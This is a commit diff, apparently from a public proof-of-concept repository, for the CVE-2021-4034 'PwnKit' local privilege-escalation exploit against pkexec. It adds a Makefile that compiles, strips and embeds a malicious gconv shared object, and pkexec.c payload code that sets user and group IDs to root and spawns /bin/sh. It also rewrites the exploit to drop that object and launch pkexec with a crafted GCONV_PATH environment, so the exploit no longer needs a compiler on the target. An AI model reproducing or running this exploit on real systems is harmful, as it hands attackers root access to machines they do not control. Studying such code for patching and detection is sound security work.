embed pwnkit.so (no gcc required anymore)

Makefile

@@ -0,0 +1,21 @@
+define do_strip
+strip -R ".jcr"               \
+      -R ".comment"           \
+      -R ".eh_frame"          \
+      -R ".eh_frame_hdr"      \
+      -R ".note.gnu.build-id" \
+      --strip-debug           \
+      --strip-unneeded        $(1)
+endef
+
+exploit: FORCE
+	gcc pwnkit.c -o pwnkit.so -shared -fPIC
+	@$(call do_strip,pwnkit.so)
+	xxd -i pwnkit.so >pwnkit.so.inc
+	gcc cve-2021-4034-poc.c -o exploit
+	@$(call do_strip,exploit)
+
+clean:
+	rm -f pwnkit.so pwnkit.so.inc exploit
+
+FORCE:

cve-2021-4034-poc.c

@@ -6,26 +6,16 @@
 #include <stdlib.h>
 #include <unistd.h>
 
-char *shell = 
-	"#include <stdio.h>\n"
-	"#include <stdlib.h>\n"
-	"#include <unistd.h>\n\n"
-	"void gconv() {}\n"
-	"void gconv_init() {\n"
-	"	setuid(0); setgid(0);\n"
-	"	seteuid(0); setegid(0);\n"
-	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
-	"	exit(0);\n"
-	"}";
+#include "pwnkit.so.inc"
 
 int main(int argc, char *argv[]) {
 	FILE *fp;
 	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
 	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
-	fp = fopen("pwnkit/pwnkit.c", "w");
-	fprintf(fp, "%s", shell);
+	fp = fopen("pwnkit/pwnkit.so", "w+");
+	if (!fp) exit(-1);
+	fwrite(pwnkit_so, pwnkit_so_len, 1, fp);
 	fclose(fp);
-	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
 	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
 	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
 }

pwnkit.c

@@ -0,0 +1,11 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv() {}
+void gconv_init() {
+	setuid(0); setgid(0);
+	seteuid(0); setegid(0);
+	system("export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh");
+	exit(0);
+};